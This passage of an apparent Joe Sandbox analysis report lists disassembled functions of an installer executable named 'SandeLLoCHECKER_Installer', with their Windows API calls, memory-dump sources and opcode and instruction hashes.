                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00A1AAED,?,?,00000000,?,?,?,00A1AC17,00000002,FlsGetValue,00AA0F08,FlsGetValue), ref: 00A1AB49
                                                                                                                        • GetLastError.KERNEL32(?,00A1AAED,?,?,00000000,?,?,?,00A1AC17,00000002,FlsGetValue,00AA0F08,FlsGetValue,?,?,00A17A34), ref: 00A1AB53
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00A1AB7B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                        • String ID: api-ms-
                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                        • Opcode ID: 00c433be412b31353b15f07f66931dddb18376dfa2e44271071c500d81ccf39b
                                                                                                                        • Instruction ID: 5b4745bca7044317f93e7ec5683c07da4b5b9ccc65ddc13d380473675b6af16a
                                                                                                                        • Opcode Fuzzy Hash: 00c433be412b31353b15f07f66931dddb18376dfa2e44271071c500d81ccf39b
                                                                                                                        • Instruction Fuzzy Hash: 9DE04F30389248BBEB201BA4EC06F993B5DAB20B50F200432FA0CE84E1EB71AD919645
                                                                                                                        Function 00867770 Relevance: 6.3, APIs: 4, Instructions: 321windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 008678B8
                                                                                                                        • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 008678CD
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                          • Part of subcall function 0093EE40: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,00867908,00000000,80004005), ref: 0093EEA8
                                                                                                                          • Part of subcall function 0093EE40: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0093EED8
                                                                                                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00867A03
                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000005), ref: 00867AFF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$AllocateHeapWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3168177373-0
                                                                                                                        • Opcode ID: de47b376081617dfa4ed6fc8c292333079c61e5482d0316c582944b8546a403f
                                                                                                                        • Instruction ID: 569abfdba5981961756aeb554fb84af7b4952659e653798e7f60d0f90c888a52
                                                                                                                        • Opcode Fuzzy Hash: de47b376081617dfa4ed6fc8c292333079c61e5482d0316c582944b8546a403f
                                                                                                                        • Instruction Fuzzy Hash: BBC19171A00209EFDB14DFA8C989BEEFBB5FF48314F144219E415AB290DB74A944CB90
                                                                                                                        Function 00855C10 Relevance: 6.3, APIs: 4, Instructions: 269memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 00855CDA
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00855D26
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00855D48
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00855EA3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Free$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 986138563-0
                                                                                                                        • Opcode ID: f8786d74dbe5f62b1bd2086c4886707afd0acefa1809f6eb0d395f1dedbe1271
                                                                                                                        • Instruction ID: 37307102d1ac0510b1a7573bb7cf9ef8d6122d0e9f3f8215b278eaa9b11e5818
                                                                                                                        • Opcode Fuzzy Hash: f8786d74dbe5f62b1bd2086c4886707afd0acefa1809f6eb0d395f1dedbe1271
                                                                                                                        • Instruction Fuzzy Hash: 0CA18371A0060ADFDB14DF98CC58BAEBBB8FF44715F104529E915D7280DB74AA05CB61
                                                                                                                        Function 0085C480 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(?), ref: 0085C55C
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0085C56B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 328075279-0
                                                                                                                        • Opcode ID: 070674ddc64f19da9f56bdcbc03b82331bc9d1dbb3a158d9246d22a572ac350f
                                                                                                                        • Instruction ID: 718c04a32f5808d20bbb4c265d3525db6b59a3c750f3a490a71b698b0ff68029
                                                                                                                        • Opcode Fuzzy Hash: 070674ddc64f19da9f56bdcbc03b82331bc9d1dbb3a158d9246d22a572ac350f
                                                                                                                        • Instruction Fuzzy Hash: B551F77590034A9FDB20DFA5C848BAA7BB4FF08311F104529F915E7280EB389945CF54
                                                                                                                        Function 00868A40 Relevance: 6.1, APIs: 4, Instructions: 125COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowDC.USER32(?,C7BA013E,?,00000000,?,?,?,?,?,00000000,00A44635,000000FF,?,00868802,?,?), ref: 00868A82
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00868AA1
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00868B61
                                                                                                                        • DeleteDC.GDI32(?), ref: 00868B84
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteWindow$ObjectRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1993412026-0
                                                                                                                        • Opcode ID: f56fcb68a63673e7eaa8d31f518ea38a248a23dd0134c309bdbc05a42d4ffe17
                                                                                                                        • Instruction ID: 35dd735dd4b9163bd69a9633c5fc8b859d44d5cece2b38114252e2379122b52f
                                                                                                                        • Opcode Fuzzy Hash: f56fcb68a63673e7eaa8d31f518ea38a248a23dd0134c309bdbc05a42d4ffe17
                                                                                                                        • Instruction Fuzzy Hash: 44415C71A00219EFDB10DFA9DD48BAEBBB9FB89311F104229F905A3290CB746D01CB64
                                                                                                                        Function 008745D0 Relevance: 6.1, APIs: 4, Instructions: 108windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000C5,?,00000000), ref: 0087461B
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0087464D
                                                                                                                        • GetDC.USER32(?), ref: 00874660
                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00874667
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsClientDeviceMessageRectSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3507044913-0
                                                                                                                        • Opcode ID: 14fe230e53607c248bcf051013eb99a94b840b2c276c645ccf75a80fd1d81d39
                                                                                                                        • Instruction ID: 7b2a4caf838b5825834620ad64b722b89c0bc8556b0f5da594b4ac8f0c346d04
                                                                                                                        • Opcode Fuzzy Hash: 14fe230e53607c248bcf051013eb99a94b840b2c276c645ccf75a80fd1d81d39
                                                                                                                        • Instruction Fuzzy Hash: 7F419D326043459FE721DF78CC06F9AB7E9AF89300F004B29F549E71A0EB70A945CB92
                                                                                                                        Function 009ABBD0 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 009ABC1A
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009ABC2D
                                                                                                                        • GetDC.USER32(00000000), ref: 009ABC87
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009ABC9A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 328075279-0
                                                                                                                        • Opcode ID: a563053699fdf8a0d3cfb933d7b4d4ac08fb30f1b7ed9b257d07baf52ed3c006
                                                                                                                        • Instruction ID: 2641a1dc695fb28d2783f83886d24da17e9f7ff73fb16d9c97012cdb6dc13cfb
                                                                                                                        • Opcode Fuzzy Hash: a563053699fdf8a0d3cfb933d7b4d4ac08fb30f1b7ed9b257d07baf52ed3c006
                                                                                                                        • Instruction Fuzzy Hash: C3316EB1910615EED712DF74DC45B6AB7BCFF1A3A5F108336E416E3291EB305942CA50
                                                                                                                        Function 00863C10 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSection.KERNEL32(?,C7BA013E), ref: 00863C7A
                                                                                                                        • EnterCriticalSection.KERNEL32(?,C7BA013E), ref: 00863C87
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00863CD8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                        • String ID: v
                                                                                                                        • API String ID: 3991485460-3261393531
                                                                                                                        • Opcode ID: 3929ec50c315bd612f20cab93950de9ccc0adef88f0f9c4f7f3fd3ec28f58b5b
                                                                                                                        • Instruction ID: f0aee9c7dc7773cc00c152ea639f41ca7e26479b48e3b4220b509ef2996ce2b6
                                                                                                                        • Opcode Fuzzy Hash: 3929ec50c315bd612f20cab93950de9ccc0adef88f0f9c4f7f3fd3ec28f58b5b
                                                                                                                        • Instruction Fuzzy Hash: 8821A336A002449FDF11DF64DC45BE9BBB4FB16324F1502B9E859EB392D7325A06CB60
                                                                                                                        Function 00863B50 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSection.KERNEL32(?,C7BA013E,?), ref: 00863BAD
                                                                                                                        • EnterCriticalSection.KERNEL32(?,C7BA013E,?), ref: 00863BBA
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00863BE2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                        • String ID: v
                                                                                                                        • API String ID: 3991485460-3261393531
                                                                                                                        • Opcode ID: 2bd535b7cd2a29215c6291fa9c358943188e6676b154cf4c4611015a1c040fa5
                                                                                                                        • Instruction ID: 2f136baf7fbc8947ba09c8fc07d8ac6c26bdfddae3c216e2fd648d365bc69458
                                                                                                                        • Opcode Fuzzy Hash: 2bd535b7cd2a29215c6291fa9c358943188e6676b154cf4c4611015a1c040fa5
                                                                                                                        • Instruction Fuzzy Hash: 2021DA36904244DFCF01CF64D840BE9BBB4FB55334F1102A9D855E7352D7325A09CB90
                                                                                                                        Function 00A13B96 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00A13B9D
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00A13BA8
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00A13C16
                                                                                                                          • Part of subcall function 00A13CF8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00A13D10
                                                                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 00A13BC3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 677527491-0
                                                                                                                        • Opcode ID: b3150081365aca82ace9fe1062a5a49dbb97f28270d744301bb3bb248b87c87f
                                                                                                                        • Instruction ID: 96988f386f1b44ba48f3e015a60925c30e3215a052f283833a340202bda3a561
                                                                                                                        • Opcode Fuzzy Hash: b3150081365aca82ace9fe1062a5a49dbb97f28270d744301bb3bb248b87c87f
                                                                                                                        • Instruction Fuzzy Hash: BC015A76A002219BCF05EF60E955ABD7BB5BF84750B244029E911AB391CF74AF82CBC1
                                                                                                                        Function 00854330 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 231windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(00000000,AtlAxWin140,?,?,?,80000000,00000000,00000000,?,00000000,00000000), ref: 008543A6
                                                                                                                        • SendMessageW.USER32(?,00000000,00000000), ref: 008544A2
                                                                                                                          • Part of subcall function 00855E00: SysFreeString.OLEAUT32(00000000), ref: 00855EA3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFreeMessageSendStringWindow
                                                                                                                        • String ID: AtlAxWin140
                                                                                                                        • API String ID: 4045344427-3842940177
                                                                                                                        • Opcode ID: e9cf54f81cacd7bdab06f3b5eafc6736cff8ad18cf04467ffc230c2341916f52
                                                                                                                        • Instruction ID: e45c17b7368fded770dbff095ce20e9cdaea75808af34cb72d1c9588b5cd6fc1
                                                                                                                        • Opcode Fuzzy Hash: e9cf54f81cacd7bdab06f3b5eafc6736cff8ad18cf04467ffc230c2341916f52
                                                                                                                        • Instruction Fuzzy Hash: F3911274600205AFDB14CF68C888B6ABBB9FF49724F1085A8F919DB291DB71E905CB50
                                                                                                                        Function 009940C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 167COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • CloseHandle.KERNEL32(?,C7BA013E,000000C9,00000000), ref: 00994243
                                                                                                                        • DeleteCriticalSection.KERNEL32(?,C7BA013E,000000C9,00000000), ref: 009942D1
                                                                                                                        Strings
                                                                                                                        • << Advanced Installer (x86) Log >>, xrefs: 009941AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer$CloseCriticalDeleteHandleHeapProcessSection
                                                                                                                        • String ID: << Advanced Installer (x86) Log >>
                                                                                                                        • API String ID: 3699736680-396061572
                                                                                                                        • Opcode ID: ef6dbcf4d5c297fca8aa0081a300114857d482fa7a7ee762e0ed93b119281f0c
                                                                                                                        • Instruction ID: a4ece6f43ceae1e0fb6ac3ad577dc8f40da6390b87edf2000f9c4b168a873754
                                                                                                                        • Opcode Fuzzy Hash: ef6dbcf4d5c297fca8aa0081a300114857d482fa7a7ee762e0ed93b119281f0c
                                                                                                                        • Instruction Fuzzy Hash: 1A61ED71A00649DFDB01CF6CC908B5EBBF8FF95314F248299E4019B791DB74AA05CBA1
                                                                                                                        Function 009B6730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenEventW.KERNEL32(00000000,00000000,C7BA013E,_pbl_evt,00000008,?,?,00AC270C,00000001,C7BA013E,00000000), ref: 009B67DE
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 009B67FB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Event$CreateOpen
                                                                                                                        • String ID: _pbl_evt
                                                                                                                        • API String ID: 2335040897-4023232351
                                                                                                                        • Opcode ID: 6b6c3869cb2fc16a348e08682fb2a4f2a15fa181696b92e199e140877c9cbcdc
                                                                                                                        • Instruction ID: f18f5a3f6f83ee5ca9f32379ab7915ffc8a39e5bb276ed86c024acb3284973e4
                                                                                                                        • Opcode Fuzzy Hash: 6b6c3869cb2fc16a348e08682fb2a4f2a15fa181696b92e199e140877c9cbcdc
                                                                                                                        • Instruction Fuzzy Hash: 2B518271D10609EFDB10DF68CD46BEEB7B8FF04720F508229E811A7280EB746A45CB95
                                                                                                                        Function 00886310 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0088633B
